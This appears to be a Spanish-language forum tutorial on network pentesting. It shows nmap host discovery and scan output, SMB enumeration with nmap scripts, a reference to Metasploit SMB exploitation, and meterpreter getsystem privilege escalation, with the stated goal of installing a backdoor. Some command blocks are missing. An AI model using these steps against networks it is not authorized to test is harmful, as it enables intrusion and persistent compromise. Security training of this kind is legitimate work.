Escenario Pentesting en Redes

Esto es un escenario importante a la hora de un pentesting en una red, donde tenemos que tener en cuenta algunos puntos como:


    1) Como se compone la red
    2) Cuantos equipos hay en red
    3) Servicios de estos equipos
    4) Bug en los nodos
    5) Ejecutar exploits
    6) Subir privilegios
    7) Instalar backdoor



A la hora de hacer una práctica en red es tratar de cumplir, como mínimo, estos estándares, los cuales tienen la finalidad de obtener los mayores nodos y tener la red completa.

1) Cómo se compone la red

Hay que tener en cuenta como se compone la estructura de esta red ya sea una lan, wlan u otras.

2) Para esto podemos utilizar similitudes de software pero para averiguar cuántos equipos hay en red la mejor es nmap primero verifico mi IP, esto será plataforma Windows.

Iniciamos mirando cual es mi ip ya que maneja un DHCP y me asigno una IP.


Código:
Todo de mi ip desde rango 1 hasta 255 para ver los equipos


Como podemos ver existen tres IP activas con sus respectivos servicios.

    PORT     STATE SERVICE

    21/tcp   open  ftp

    22/tcp   open  ssh

    23/tcp   open  telnet
    80/tcp   open  http
    5431/tcp open  park-agent
    MAC Address: 14:D6:4D:8B:20:42 (Unknown)

    Nmap scan report for 192.168.0.4
    Host is up (0.0026s latency).
    Not shown: 995 filtered ports
    PORT     STATE  SERVICE
    135/tcp  open   msrpc
    139/tcp  open   netbios-ssn
    445/tcp  open   microsoft-ds
    1025/tcp open   NFS-or-IIS
    2869/tcp closed unknown
    MAC Address: 00:16:17:A6:A6:F9 (MSI)

    Nmap scan report for 192.168.0.5
    Host is up (0.0024s latency).
    Not shown: 996 filtered ports
    PORT     STATE  SERVICE
    139/tcp  open   netbios-ssn
    445/tcp  open   microsoft-ds
    2126/tcp closed unknown
    2869/tcp closed unknown
    MAC Address: 00:13:8F:8B:3D:4F (Asiarock Incorporation)


De aquí en adelante ya están las maquinas de la red.



3) Mirando aquí los equipos tienen lo mismo de la parte dos pero ahora veremos el tipo de servicio que se ejecuta y su versión un poco OS fingerprint. 

Mirando el primer equipo es un router, se sigue mirando información mas detallada.



4) Ya sabiendo que protocolos utilizó miremos mas información ahora con scripts de Nmap.

   smb-check-vulns.nse --me dice fallos protocolos
    smb-enum-groups.nse -- grupo de usuario
    smb-enum-processes.nse -- procesos que utiliza
    smb-enum-sessions.nse -- session activa
    smb-enum-users.nse -- todos los usuarios

Ok esto se mostraría de la siguiente forma

--script=smb-check-vulns.nse,smb-enum-users.nse,smb-enum-sessions.nse,smb-enum-groups.nse,smb-enum-processes.nse




Como vemos tenemos información detallada para el pentest.

5) Por ultimo con metasploit es vulnerable a protocolo SMB


Ahora la finalidad es subir todos los privilegios que pueda obtener para instalar backdoor.

6) Subir privilegios

Para esto haremos lo siguiente

    meterpreter> use priv
    meterpreter > getsystem -h
    Usage: getsystem [options]
    Attempt to elevate your privilege to that of local system.
    OPTIONS:
    -h Help Banner.
    -t The technique to use. (Default to ’0′).
    0 : All techniques available
    1 : Service – Named Pipe Impersonation (In Memory/Admin)
    2 : Service – Named Pipe Impersonation (Dropper/Admin)
    3 : Service – Token Duplication (In Memory/Admin)
    4 : Exploit – KiTrap0D (In Memory/User)

Como se puede apreciar existen diferentes técnicas empleadas por la extensión priv para elevar los privilegios de la consola actual, se puede utilizar una de las técnicas o todas, si no se especifica ningún parámetro ningún parámetro se utilizan todas.

   meterpreter > getsystem
    …got system (via technique 1).
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter >

6) La instalación del backdoor se las debo por que en estos momentos no lo tengo a mano.

Muchas gracias a la entrada de Inp3nt3zt3 su contacto es p3ngohz@hotmail.com si tienen dudas o desean mas información.